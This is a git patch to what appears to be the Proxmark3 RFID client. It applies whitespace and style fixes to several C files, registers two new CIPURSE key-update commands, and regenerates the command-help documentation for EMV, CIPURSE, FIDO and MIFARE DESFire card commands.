From c53dc84e6190edf94eb5105d91572fc7aa908e1f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Ya=C5=9Far=20Klawohn?=
Date: Wed, 9 Feb 2022 15:21:00 +0100
Subject: [PATCH 1/3] make style
---
 client/src/cmdhfcipurse.c | 6 +-
 client/src/cmdhfmfdes.c | 2 +-
 client/src/cmdhfmfp.c | 2 +-
 client/src/cmdhfmfu.c | 20 +-
 client/src/pm3line_vocabulory.h | 2 +
 doc/commands.json | 1351 ++++++++++++++++---------------
 doc/commands.md | 24 +-
 7 files changed, 735 insertions(+), 672 deletions(-)
diff --git a/client/src/cmdhfcipurse.c b/client/src/cmdhfcipurse.c
index 3a8e492449..27c29c1912 100644
--- a/client/src/cmdhfcipurse.c
+++ b/client/src/cmdhfcipurse.c
@@ -233,7 +233,7 @@ static int CLIParseCommandParametersEx(CLIParserContext *ctx, size_t keyid, size
 if (CLIParamHexToBuf(arg_get_str(ctx, aidid), hdata, hdatalen, &hdatalen)) {
 return PM3_ESOFT;
 }
-
+
 if (hdatalen && (hdatalen < 1 || hdatalen > 16)) {
 PrintAndLogEx(ERR, _RED_("ERROR:") " application id length must be 1-16 bytes only");
 return PM3_EINVARG;
@@ -1466,7 +1466,7 @@ static int CmdHFCipurseUpdateKey(const char *Cmd) {
 arg_int0(NULL, "newkeyn", "", "target key ID"),
 arg_str0(NULL, "newkey", "", "new key"),
 arg_str0(NULL, "newkeya", "", "new key additional info. 0x00 by default"),
-
+
 arg_int0(NULL, "enckeyn", "", "encrypt key ID (must be equal to the key on the card)"),
 arg_str0(NULL, "enckey", "", "encrypt key (must be equal to the key on the card)"),
@@ -1541,7 +1541,7 @@ static int CmdHFCipurseUpdateKey(const char *Cmd) {
 uint8_t encKey[CIPURSE_AES_KEY_LENGTH] = CIPURSE_DEFAULT_KEY;
 if (hdatalen) memcpy(encKey, hdata, CIPURSE_AES_KEY_LENGTH);
-
+
 bool noauth = arg_get_lit(ctx, 15);
 bool needCommit = arg_get_lit(ctx, 16);
diff --git a/client/src/cmdhfmfdes.c b/client/src/cmdhfmfdes.c
index 5b7438c8cc..fa445d5012 100644
--- a/client/src/cmdhfmfdes.c
+++ b/client/src/cmdhfmfdes.c
@@ -4998,7 +4998,7 @@ static int CmdHF14ADesWriteData(const char *Cmd) {
 arg_lit0(NULL, "debit", "use for value file debit operation instead of credit"),
 arg_lit0(NULL, "commit", "commit needs for backup file only. For the other file types and in the `auto` mode - command set it automatically"),
 arg_int0(NULL, "updaterec", "", "Record number for update record command. Updates record instead of write. Lastest record - 0"),
- arg_str0(NULL, "isoid" , "", "Application ISO ID (ISO DF ID) (2 hex bytes, big endian)"),
+ arg_str0(NULL, "isoid", "", "Application ISO ID (ISO DF ID) (2 hex bytes, big endian)"),
 arg_str0(NULL, "fileisoid", "", "File ISO ID (ISO DF ID) (2 hex bytes, big endian). Works only for ISO write commands"),
 arg_str0(NULL, "readerid", "", "reader id for CommitReaderID command. If present - the command issued before write command"),
 arg_str0(NULL, "trkey", "", "key for decode previous reader id"),
diff --git a/client/src/cmdhfmfp.c b/client/src/cmdhfmfp.c
index b90f1b9bc1..fa8bfbd9e4 100644
--- a/client/src/cmdhfmfp.c
+++ b/client/src/cmdhfmfp.c
@@ -893,7 +893,7 @@ static int CmdHFMFPWrbl(const char *Cmd) {
 void *argtable[] = {
 arg_param_begin,
- arg_lit0("v", "verbose", "Verbose mode"),
+ arg_lit0("v", "verbose", "Verbose mode"),
 arg_lit0("b", "keyb", "Use key B (def: keyA)"),
 arg_int1(NULL, "blk", "<0..255>", "Block number"),
 arg_str1("d", "data", "", "Data, 16 hex bytes"),
diff --git a/client/src/cmdhfmfu.c b/client/src/cmdhfmfu.c
index 3a19c4ade6..fa5fcb8a00 100644
--- a/client/src/cmdhfmfu.c
+++ b/client/src/cmdhfmfu.c
@@ -135,22 +135,22 @@ static int ul_print_nxp_silicon_info(uint8_t *card_uid) {
 uint16_t waferCoordX = ((uid[6] & 3) << 8) | uid[1];
 uint16_t waferCoordY = ((uid[6] & 12) << 6) | uid[2];
 uint32_t waferCounter = (
- (uid[4] << 5) |
- ((uid[6] & 0xF0) << 17) |
- (uid[5] << 13) |
- (uid[3] >> 3)
- );
+ (uid[4] << 5) |
+ ((uid[6] & 0xF0) << 17) |
+ (uid[5] << 13) |
+ (uid[3] >> 3)
+ );
 uint8_t testSite = uid[3] & 7;
 PrintAndLogEx(NORMAL, "");
 PrintAndLogEx(INFO, "--- " _CYAN_("Tag Silicon Information"));
 PrintAndLogEx(INFO, " Wafer Counter: %" PRId32 " ( 0x%02" PRIX32 " )", waferCounter, waferCounter);
 PrintAndLogEx(INFO, " Wafer Coordinates: x %" PRId16 ", y %" PRId16 " (0x%02" PRIX16 ", 0x%02" PRIX16 ")"
- , waferCoordX
- , waferCoordY
- , waferCoordX
- , waferCoordY
- );
+ , waferCoordX
+ , waferCoordY
+ , waferCoordX
+ , waferCoordY
+ );
 PrintAndLogEx(INFO, " Test Site: %u", testSite);
 return PM3_SUCCESS;
 }
diff --git a/client/src/pm3line_vocabulory.h b/client/src/pm3line_vocabulory.h
index b58422b706..63a438f6d1 100644
--- a/client/src/pm3line_vocabulory.h
+++ b/client/src/pm3line_vocabulory.h
@@ -185,6 +185,8 @@ const static vocabulory_t vocabulory[] = {
 { 0, "hf cipurse formatall" },
 { 0, "hf cipurse create" },
 { 0, "hf cipurse delete" },
+ { 0, "hf cipurse updkey" },
+ { 0, "hf cipurse updakey" },
 { 0, "hf cipurse default" },
 { 1, "hf cipurse test" },
 { 1, "hf epa help" },
diff --git a/doc/commands.json b/doc/commands.json
index 5332ea3487..e3c68d3fca 100644
--- a/doc/commands.json
+++ b/doc/commands.json
@@ -708,7 +708,7 @@ "-h, --help this help", "-k, -k, --keep keep field on for next command", "-a, -a, --apdu show apdu reqests and responses", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv challenge [-hkaw]" },
@@ -728,10 +728,10 @@ "-c, -c, --cda executes cda transaction. needs to get sdad in results.", "-d, -d, --decision terminal decision. aac - declined, tc - approved, arqc - online authorisation requested", "-p, -p, --params load parameters from `emv_defparams.json` file for cdoldata making from cdol and parameters", - "-m, -m, --make make cdoldata from cdol (tag 8c and 8d) and parameters (by default uses default parameters)", + "-m, -m, --make make cdoldata from cdol (tag 8c and 8d) and parameters (def: use default parameters)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " cdoldata/cdol" ], "usage": "emv genac [-hkcpmatw] [-d ] []..." 
@@ -749,17 +749,17 @@ "-h, --help this help", "-k, -k, --keep keep field on for next command", "-p, -p, --params load parameters from `emv_defparams.json` file for pdoldata making from pdol and parameters", - "-m, -m, --make make pdoldata from pdol (tag 9f38) and parameters (by default uses default parameters)", + "-m, -m, --make make pdoldata from pdol (tag 9f38) and parameters (def: uses default parameters)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " pdoldata/pdol" ], "usage": "emv gpo [-hkpmatw] []..." }, "emv help": { "command": "emv help", - "description": "help this help test crypto logic test. list list iso7816 history --------------------------------------------------------------------------------------- emv exec available offline: no executes emv contactless transaction", + "description": "help this help test crypto logic test list list iso7816 history --------------------------------------------------------------------------------------- emv exec available offline: no executes emv contactless transaction", "notes": [ "emv exec -sat -> select card, execute msd transaction, show apdu and tlv", "emv exec -satc -> select card, execute cda transaction, show apdu and tlv" 
@@ -767,17 +767,17 @@ "offline": true, "options": [ "-h, --help this help", - "-s, -s, --select activate field and select card.", - "-a, -a, --apdu show apdu reqests and responses.", - "-t, -t, --tlv tlv decode results.", - "-j, -j, --jload load transaction parameters from `emv_defparams.json` file.", - "-f, -f, --forceaid force search aid. search aid instead of execute ppse.", + "-s, -s, --select activate field and select card", + "-a, -a, --apdu show apdu reqests and responses", + "-t, -t, --tlv tlv decode results", + "-j, -j, --jload load transaction parameters from `emv_defparams.json` file", + "-f, -f, --forceaid force search aid. search aid instead of execute ppse", "by default: transaction type - msd", - "-v, -v, --qvsdc transaction type - qvsdc or m/chip.", - "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation).", - "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior.", - "-g, -g, --acgpo visa. generate ac from gpo.", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-v, -v, --qvsdc transaction type - qvsdc or m/chip", + "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation)", + "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior", + "-g, -g, --acgpo visa. generate ac from gpo", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv exec [-hsatjfvcxgw] by default:" }, 
@@ -794,10 +794,10 @@ "-h, --help this help", "-k, -k, --keep keep field on for next command", "-p, -p, --params load parameters from `emv_defparams.json` file for ddoldata making from ddol and parameters", - "-m, -m, --make make ddoldata from ddol (tag 9f49) and parameters (by default uses default parameters)", + "-m, -m, --make make ddoldata from ddol (tag 9f49) and parameters (def: use default parameters)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " ddoldata/ddol" ], "usage": "emv intauth [-hkpmatw] []..." @@ -836,10 +836,10 @@ "-s, -s, --select activate field and select card", "-k, -k, --keep keep field on for next command", "-1, --pse pse (1pay.sys.ddf01) mode", - "-2, --ppse ppse (2pay.sys.ddf01) mode (default mode)", + "-2, --ppse ppse (2pay.sys.ddf01) mode (def)", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv pse [-hsk12atw]" }, @@ -856,7 +856,7 @@ "-k, -k, --keep keep field on for next command", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " []..." 
@@ -873,7 +873,7 @@ "-h, --help this help", "-t, -t, --selftest self test", "-a, -a, --apdu show apdu reqests and responses", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default" + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv roca [-htaw]" }, @@ -887,17 +887,17 @@ "offline": false, "options": [ "-h, --help this help", - "-a, -a, --apdu show apdu reqests and responses.", - "-t, -t, --tlv tlv decode results.", + "-a, -a, --apdu show apdu reqests and responses", + "-t, -t, --tlv tlv decode results", "-e, -e, --extract extract tlv elements and fill application data", - "-j, -j, --jload load transaction parameters from `emv_defparams.json` file.", + "-j, -j, --jload load transaction parameters from `emv_defparams.json` file", "by default: transaction type - msd", - "-v, -v, --qvsdc transaction type - qvsdc or m/chip.", - "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation).", - "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior.", - "-g, -g, --acgpo visa. generate ac from gpo.", + "-v, -v, --qvsdc transaction type - qvsdc or m/chip", + "-c, -c, --qvsdccda transaction type - qvsdc or m/chip plus cda (sdad generation)", + "-x, -x, --vsdc transaction type - vsdc. for test only. not a standard behavior", + "-g, -g, --acgpo visa. generate ac from gpo", "-m, -m, --merge merge output file with card's data. (warning: the file may be corrupted!)", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " json output filename" ], "usage": "emv scan [-hatejvcxgmw] by default: " 
@@ -916,7 +916,7 @@ "-k, -k, --keep keep field on for next command", "-a, -a, --apdu show apdu reqests and responses", "-t, -t, --tlv tlv decode results of selected applets", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default." + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)" ], "usage": "emv search [-hskatw]" }, @@ -934,7 +934,7 @@ "-k, -k, --keep keep field for next command", "-a, -a, --apdu show apdu requests and responses", "-t, -t, --tlv tlv decode results", - "-w, -w, --wired send data via contact (iso7816) interface. contactless interface set by default.", + "-w, -w, --wired send data via contact (iso7816) interface. (def: contactless interface)", " applet aid" ], "usage": "emv select [-hskatw] " @@ -1703,18 +1703,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", "--mfd show info about master file", - "--aid select application id (aid)", + "--aid select application id (aid) ( 1..16 bytes )", "--fid file id", - "--chfid child file id (ef under application/master file)", + "--chfid child file id (ef under application/master file) ( 2 bytes )", "--noauth read file attributes without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level" + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)" ], - "usage": "hf cipurse aread [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ]" + "usage": "hf cipurse aread [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ]" }, "hf cipurse auth": { "command": "hf cipurse auth", 
@@ -1727,14 +1727,14 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", - "--aid application id (aid)", - "--fid top file/application id (fid)", + "-v, --verbose verbose mode", + "--aid application id (aid) ( 1..16 bytes )", + "--fid top file/application id (fid) ( 2 bytes )", "--mfd select masterfile by empty id", "-n key id", "-k, --key auth key" ], - "usage": "hf cipurse auth [-hav] [--aid ] [--fid ] [--mfd] [-n ] [-k ]" + "usage": "hf cipurse auth [-hav] [--aid ] [--fid ] [--mfd] [-n ] [-k ]" }, "hf cipurse awrite": { "command": "hf cipurse awrite", @@ -1749,20 +1749,20 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", "--mfd show info about master file", - "--aid select application id (aid)", + "--aid select application id (aid) ( 1..16 bytes )", "--fid file id", - "--chfid child file id (ef under application/master file)", + "--chfid child file id (ef under application/master file) ( 2 bytes )", "--noauth read file attributes without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "-d, --data file attributes", - "--commit need commit after write" + "--commit commit after write" ], - "usage": "hf cipurse awrite [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" + "usage": "hf cipurse awrite [-hav] [-n ] [-k ] [--mfd] [--aid ] [--fid ] [--chfid ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" }, "hf cipurse create": { "command": "hf cipurse create", 
@@ -1776,19 +1776,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--aid application id (aid)", - "--fid file id (fid)", + "--aid application id (aid) ( 1..16 bytes )", + "--fid file id (fid) ( 2 bytes )", "--mfd select masterfile by empty id", "-d, --data data with dgi for create", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "--no-auth execute without authentication", - "--commit need commit after create" + "--commit commit after create" ], - "usage": "hf cipurse create [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [-d ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + "usage": "hf cipurse create [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [-d ] [--sreq ] [--sresp ] [--no-auth] [--commit]" }, "hf cipurse default": { "command": "hf cipurse default", @@ -1804,10 +1804,10 @@ "--clear resets to defaults", "-n key id", "-k, --key authentication key", - "--aid application id (aid)", - "--fid file id" + "--aid application id (aid) ( 1..16 bytes )", + "--fid file id ( 2 bytes )" ], - "usage": "hf cipurse default [-h] [--clear] [-n ] [-k ] [--aid ] [--fid ]" + "usage": "hf cipurse default [-h] [--clear] [-n ] [-k ] [--aid ] [--fid ]" }, "hf cipurse delete": { "command": "hf cipurse delete", 
@@ -1822,18 +1822,18 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", "--fid file/application id under mf for delete", - "--aid application id (aid) for delete", - "--chfid child file id (ef under application/master file)", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--aid application id (aid) for delete ( 1..16 bytes )", + "--chfid child file id (ef under application/master file) ( 2 bytes )", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "--no-auth execute without authentication", - "--commit commit" + "--commit commit after delete" ], - "usage": "hf cipurse delete [-hav] [-n ] [-k ] [--fid ] [--aid ] [--chfid ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + "usage": "hf cipurse delete [-hav] [-n ] [-k ] [--fid ] [--aid ] [--chfid ] [--sreq ] [--sresp ] [--no-auth] [--commit]" }, "hf cipurse formatall": { "command": "hf cipurse formatall", @@ -1847,14 +1847,14 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", "--no-auth execute without authentication" ], - "usage": "hf cipurse formatall [-hav] [-n ] [-k ] [--sreq ] [--sresp ] [--no-auth]" + "usage": "hf cipurse formatall [-hav] [-n ] [-k ] [--sreq ] [--sresp ] [--no-auth]" }, "hf cipurse help": { "command": "hf cipurse help", 
@@ -1880,17 +1880,17 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--aid application id (aid)", + "--aid application id (aid) ( 1..16 bytes )", "--fid file id", "-o, --offset offset for reading data from file", "--noauth read file without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level" + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)" ], - "usage": "hf cipurse read [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ]" + "usage": "hf cipurse read [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ]" }, "hf cipurse select": { "command": "hf cipurse select", @@ -1905,14 +1905,14 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-t, --tlv tlv decode returned data", - "--aid application id (aid)", - "--fid top level file (or application) id (fid)", + "--aid application id (aid) 1..16 bytes", + "--fid top level file (or application) id (fid) 2 bytes", "--mfd select masterfile by empty id", - "--chfid child file id (ef under application/master file)" + "--chfid child file id (ef under application/master file) 2 bytes" ], - "usage": "hf cipurse select [-havt] [--aid ] [--fid ] [--mfd] [--chfid ]" + "usage": "hf cipurse select [-havt] [--aid ] [--fid ] [--mfd] [--chfid ]" }, "hf cipurse test": { "command": "hf cipurse test", 
@@ -1929,6 +1929,61 @@ ], "usage": "hf epa cnonces [-h] --size --num -d " }, + "hf cipurse updakey": { + "command": "hf cipurse updakey", + "description": "update key attributes. factory default - 0x02. b0 - update right - 1 self b1 - change key and rights - 0 frozen b2 - use as key encryption key - 1 blocked b8 - key validity - 0 valid", + "notes": [ + "hf cipurse updakey --trgkeyn 2 --attr 80 -> block key 2 for lifetime (warning!)", + "hf cipurse updakey --trgkeyn 1 --attr 02 --commit -> for key 1" + ], + "offline": false, + "options": [ + "-h, --help this help", + "-a, --apdu show apdu requests and responses", + "-v, --verbose show technical data", + "-n key id for authentication", + "-k, --key auth key", + "--aid application id (aid)", + "--fid file id (fid)", + "--mfd select masterfile by empty id", + "--trgkeyn target key id", + "--attr key attributes 1 byte", + "--sreq communication reader-picc security level", + "--sresp communication picc-reader security level", + "--no-auth execute without authentication", + "--commit commit" + ], + "usage": "hf cipurse updakey [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [--trgkeyn ] [--attr ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + }, + "hf cipurse updkey": { + "command": "hf cipurse updkey", + "description": "update key.", + "notes": [ + "hf cipurse updkey --aid 4144204631 --newkeyn 2 --newkeya 00 --newkey 73737373737373737373737373737373 -> update default application key 2 with default value 73..73", + "hf cipurse updkey --newkeyn 1 --newkeya 00 --newkey 0102030405060708090a0b0c0d0e0f10 --commit -> for key 1" + ], + "offline": false, + "options": [ + "-h, --help this help", + "-a, --apdu show apdu requests and responses", + "-v, --verbose show technical data", + "-n key id for authentication", + "-k, --key auth key", + "--aid application id (aid)", + "--fid file id (fid)", + "--mfd select masterfile by empty id", + "--newkeyn target key id", + "--newkey new key", + "--newkeya new key additional info. 
0x00 by default", + "--enckeyn encrypt key id (must be equal to the key on the card)", + "--enckey encrypt key (must be equal to the key on the card)", + "--sreq communication reader-picc security level", + "--sresp communication picc-reader security level", + "--no-auth execute without authentication", + "--commit commit" + ], + "usage": "hf cipurse updakey [-hav] [-n ] [-k ] [--aid ] [--fid ] [--mfd] [--newkeyn ] [--newkey ] [--newkeya ] [--enckeyn ] [--enckey ] [--sreq ] [--sresp ] [--no-auth] [--commit]" + }, "hf cipurse write": { "command": "hf cipurse write", "description": "write file in the application by file id with key id and key. if no key is supplied, default key of 737373...7373 will be used", @@ -1942,19 +1997,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n key id", "-k, --key auth key", - "--aid application id (aid)", + "--aid application id (aid) ( 1..16 bytes )", "--fid file id", "-o, --offset offset for reading data from file", "--noauth read file without authentication", - "--sreq communication reader-picc security level", - "--sresp communication picc-reader security level", - "-d, --data hex data to write to new file", - "--commit need commit after write" + "--sreq communication reader-picc security level (def: mac)", + "--sresp communication picc-reader security level (def: mac)", + "-d, --data data to write to new file", + "--commit commit after write" ], - "usage": "hf cipurse write [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" + "usage": "hf cipurse write [-hav] [-n ] [-k ] [--aid ] [--fid ] [-o ] [--noauth] [--sreq ] [--sresp ] [-d ] [--commit]" }, "hf emrtd help": { "command": "hf emrtd help", 
@@ -2317,7 +2372,7 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu reqests and responses", - "-v, --verbose show technical data. vv - show full certificates data", + "-v, --verbose verbose mode. vv - show full certificates data", "-c, --cbor show cbor decoded data", "-l, --list add credentialid from json to allowlist", "-f, --file parameter json file name" @@ -2338,19 +2393,19 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu reqests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "default mode: dont-enforce-user-presence-and-sign", "-u, --user mode: enforce-user-presence-and-sign", "-c, --check mode: check-only", - "-f, --file json input file name for parameters", + "-f, --file json file name for parameters", "-k, --key public key to verify signature", "--kh key handle (var 0..255b)", - "--cp challenge parameter (1..16 chars)", - "--ap application parameter (1..16 chars)", + "--cp challenge parameter (1..16 chars)", + "--ap application parameter (1..16 chars)", "--cpx challenge parameter (32 bytes hex)", "--apx application parameter (32 bytes hex)" ], - "usage": "hf fido auth [-havuc] default mode: [-f ] [-k ] [--kh ] [--cp ] [--ap ] [--cpx ] [--apx ]" + "usage": "hf fido auth [-havuc] default mode: [-f ] [-k ] [--kh ] [--cp ] [--ap ] [--cpx ] [--apx ]" }, "hf fido help": { "command": "hf fido help", @@ -2396,7 +2451,7 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu reqests and responses", - "-v, --verbose show technical data. vv - show full certificates data", + "-v, --verbose verbose mode. vv - show full certificates data", "-t, --tlv show der certificate contents in tlv representation", "-c, --cbor show cbor decoded data", "-f, --file parameter json file name" 
@@ -2416,15 +2471,15 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data. vv - show full certificates data", + "-v, --verbose verbose mode. vv - show full certificates data", "-t, --tlv show der certificate contents in tlv representation", "-f, --file json input file name for parameters", - "--cp challenge parameter (1..16 chars)", - "--ap application parameter (1..16 chars)", + "--cp challenge parameter (1..16 chars)", + "--ap application parameter (1..16 chars)", "--cpx challenge parameter (32 bytes hex)", "--apx application parameter (32 bytes hex)" ], - "usage": "hf fido reg [-havt] [-f ] [--cp ] [--ap ] [--cpx ] [--apx ]" + "usage": "hf fido reg [-havt] [-f ] [--cp ] [--ap ] [--cpx ] [--apx ]" }, "hf gallagher clone": { "command": "hf gallagher clone", @@ -3475,7 +3530,7 @@ "-h, --help this help", "-k, --key key specified as 12 hex symbols", "--blk input block number", - "-a target key a, if found also check key b for duplicate", + "-a target key a", "-b target key b", "-*, --all target both key a & b (default)", "--mini mifare classic mini / s20", 
@@ -4239,7 +4294,7 @@ "command": "hf mfdes auth", "description": "select application on the card. it selects app if it is a valid one or returns an error.", "notes": [ - "hf mfdes auth -n 0 -t des -k 0000000000000000 -f none -> select picc level and authenticate with key num=0, key type=des, key=00..00 and key derivation = none", + "hf mfdes auth -n 0 -t des -k 0000000000000000 --kdf none -> select picc level and authenticate with key num=0, key type=des, key=00..00 and key derivation = none", "hf mfdes auth -n 0 -t aes -k 00000000000000000000000000000000 -> select picc level and authenticate with key num=0, key type=aes, key=00..00 and key derivation = none", "hf mfdes auth -n 0 -t des -k 0000000000000000 --save -> select picc level and authenticate and in case of successful authentication - save channel parameters to defaults", "hf mfdes auth --aid 123456 -> select application 123456 and authenticate via parameters from `default` command" 
@@ -4248,109 +4303,110 @@ "options": [ "-h, --help this help", "-a, --apdu show apdu requests and responses", - "-v, --verbose show technical data", + "-v, --verbose verbose mode", "-n, --keyno key number", - "-t, --algo crypt algo: des, 2tdea, 3tdea, aes", + "-t, --algo crypt algo", "-k, --key key for authenticate (hex 8(des), 16(2tdea or aes) or 24(3tdea) bytes)", - "-f, --kdf key derivation function (kdf): none, an10922, gallagher", - "-i, --kdfi kdf input (hex 1-31 bytes)", - "-m, --cmode communicaton mode: plain/mac/encrypt", - "-c, --ccset communicaton command set: native/niso/iso", - "-s, --schann secure channel: d40/ev1/ev2/lrp", + "--kdf key derivation function (kdf)", + "-i, --kdfi kdf input (1-31 hex bytes)", + "-m, --cmode communicaton mode", + "-c, --ccset communicaton command set", + "--schann secure channel", "--aid application id of application for some parameters (3 hex bytes, big endian)", - "--appisoid application iso id (iso df id) (2 hex bytes, big endian).", + "--isoid application iso id (iso df id) (2 hex bytes, big endian)", "--save saves channels parameters to defaults if authentication succeeds" ], - "usage": "hf mfdes auth [-hav] [-n ] [-t ] [-k ] [-f ] [-i ] [-m ] [-c ] [-s ] [--aid ] [--appisoid ] [--save]" + "usage": "hf mfdes auth [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--isoid ] [--save]" }, "hf mfdes bruteaid": { "command": "hf mfdes bruteaid", "description": "recover aids by bruteforce. 
warning: this command takes a loooong time", "notes": [ "hf mfdes bruteaid -> search all apps", - "hf mfdes bruteaid -s f0000f -i 16 -> search mad range manually" + "hf mfdes bruteaid --start f0000f -i 16 -> search mad range manually" ], "offline": false, "options": [ "-h, --help this help", - "-s, --start starting app id as hex bytes (3 bytes, big endian)", - "-e, --end last app id as hex bytes (3 bytes, big endian)", + "--start starting app id as hex bytes (3 bytes, big endian)", + "--end last app id as hex bytes (3 bytes, big endian)", "-i, --step increment step when bruteforcing", "-m, --mad only bruteforce the mad range" ], - "usage": "hf mfdes bruteaid [-hm] [-s ] [-e ] [-i ]" + "usage": "hf mfdes bruteaid [-hm] [--start ] [--end ] [-i ]" }, "hf mfdes changekey": { "command": "hf mfdes changekey", "description": "change picc/application key. needs to provide keynum/key for a valid authentication (may get from default parameters).", "notes": [ - "change crypto algorithm for picc key is possible, but for app keys crypto algorithm is set by createapp command and can't be changed wo application delete", + "change crypto algorithm for picc key is possible,", + "but for app keys crypto algorithm is set by createapp command and can't be changed wo application delete", "", "hf mfdes changekey --aid 123456 -> execute with default factory setup. 
